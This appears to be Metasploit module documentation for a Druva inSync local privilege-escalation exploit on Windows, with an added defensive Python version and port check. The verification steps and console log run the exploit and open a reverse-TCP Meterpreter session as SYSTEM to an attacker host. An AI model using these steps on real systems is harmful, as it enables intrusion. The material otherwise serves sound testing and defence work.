## Vulnerable Application

Druva inSync client for Windows exposes a network service on TCP
port 6064 on the local network interface. inSync versions 6.6.3
and prior do not properly validate user-supplied program paths
in RPC type 5 messages, allowing execution of arbitrary commands
as SYSTEM.

This module has been tested successfully on inSync versions
6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).

Download:

* https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
* https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
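
An inventory-side check for the condition described above, added here as an example; it is not part of the Metasploit module or of Druva's software. It flags inSync version strings at or below 6.6.3 and looks for a listener on TCP 6064 in `netstat -ano` output. The function names, verdict labels and sample netstat text are constructed for illustration.

```python
import re

LAST_AFFECTED = (6, 6, 3)  # from the page: 6.6.3 and prior are affected
RPC_PORT = 6064            # from the page: inSync service port

# Constructed sample of `netstat -ano` output (not captured from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       1832
  TCP    127.0.0.1:49520        127.0.0.1:6064         ESTABLISHED     2240
  TCP    [::]:445               [::]:0                 LISTENING       4
"""

def parse_insync_version(text):
    """Parse '6.6.3r102156' or '6.6.3' into ((6, 6, 3), 102156 or None)."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)(?:r(\d+))?\s*", text)
    if not m:
        raise ValueError(f"unrecognised inSync version: {text!r}")
    major, minor, patch, build = m.groups()
    return (int(major), int(minor), int(patch)), (int(build) if build else None)

def is_affected(version_text):
    """True when the release number is 6.6.3 or lower; the build is ignored."""
    release, _build = parse_insync_version(version_text)
    return release <= LAST_AFFECTED

def listeners_on_port(netstat_text, port=RPC_PORT):
    """Return the local addresses in LISTENING state on the given TCP port."""
    found = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0].upper() != "TCP":
            continue  # header, blank or UDP line
        if fields[3].upper() != "LISTENING":
            continue  # client connections to the port are not listeners
        addr, _, local_port = fields[1].rpartition(":")
        if local_port == str(port):
            found.append(addr)
    return found

def triage(version_text, netstat_text):
    """Combine both signals into one verdict label for a host."""
    if not is_affected(version_text):
        return "not-affected"
    return "exposed" if listeners_on_port(netstat_text) else "affected-not-listening"

if __name__ == "__main__":
    print(triage("6.6.3r102156", SAMPLE_NETSTAT))
```

A version match alone only shows the build is in the affected range; the listener check narrows it to hosts where the service is actually running.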


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check`
  6. `run`
  7. You should get a new *SYSTEM* session


## Options

  ### WritableDir

  File system path of a writable directory. (default: `%TEMP%`)


## Scenarios

### Druva inSync 6.6.3r102156 on Windows 7 SP1 (x64)

```
msf6 > use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set session 1
session => 1
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Service 'inSyncCPHService' exists.
[*] Connecting to 127.0.0.1:6064 ...
[*] Sending packet (258 bytes) to 127.0.0.1:6064 ...
[*] Sending stage (175174 bytes) to 172.16.191.171
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.171:49520) at 2020-12-10 07:03:04 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```

